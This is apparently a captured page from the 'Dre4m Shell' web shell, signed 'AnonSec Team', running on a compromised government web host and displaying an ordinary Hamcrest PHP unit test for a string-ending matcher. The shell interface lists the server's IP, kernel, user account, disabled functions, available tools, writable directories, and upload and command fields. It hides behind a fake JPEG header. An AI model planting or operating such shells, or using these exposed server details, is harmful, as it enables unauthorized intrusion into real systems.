ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.144.40.182
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/funds.upgrade.nicn.gov.ng/funds-upgraded/vendor/hamcrest/hamcrest-php/tests/Hamcrest/Text/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/funds.upgrade.nicn.gov.ng/funds-upgraded/vendor/hamcrest/hamcrest-php/tests/Hamcrest/Text/StringEndsWithTest.php
<?php
namespace Hamcrest\Text;

class StringEndsWithTest extends \Hamcrest\AbstractMatcherTest
{

    const EXCERPT = 'EXCERPT';

    private $_stringEndsWith;

    protected function setUp()
    {
        $this->_stringEndsWith = \Hamcrest\Text\StringEndsWith::endsWith(self::EXCERPT);
    }

    protected function createMatcher()
    {
        return $this->_stringEndsWith;
    }

    public function testEvaluatesToTrueIfArgumentContainsSpecifiedSubstring()
    {
        $this->assertFalse(
            $this->_stringEndsWith->matches(self::EXCERPT . 'END'),
            'should be false if excerpt at beginning'
        );
        $this->assertTrue(
            $this->_stringEndsWith->matches('START' . self::EXCERPT),
            'should be true if excerpt at end'
        );
        $this->assertFalse(
            $this->_stringEndsWith->matches('START' . self::EXCERPT . 'END'),
            'should be false if excerpt in middle'
        );
        $this->assertTrue(
            $this->_stringEndsWith->matches(self::EXCERPT . self::EXCERPT),
            'should be true if excerpt is at end and repeated'
        );

        $this->assertFalse(
            $this->_stringEndsWith->matches('Something else'),
            'should be false if excerpt is not in string'
        );
        $this->assertFalse(
            $this->_stringEndsWith->matches(substr(self::EXCERPT, 0, strlen(self::EXCERPT) - 2)),
            'should be false if part of excerpt is at end of string'
        );
    }

    public function testEvaluatesToTrueIfArgumentIsEqualToSubstring()
    {
        $this->assertTrue(
            $this->_stringEndsWith->matches(self::EXCERPT),
            'should be true if excerpt is entire string'
        );
    }

    public function testHasAReadableDescription()
    {
        $this->assertDescription('a string ending with "EXCERPT"', $this->_stringEndsWith);
    }
}

Anon7 - 2022
AnonSec Team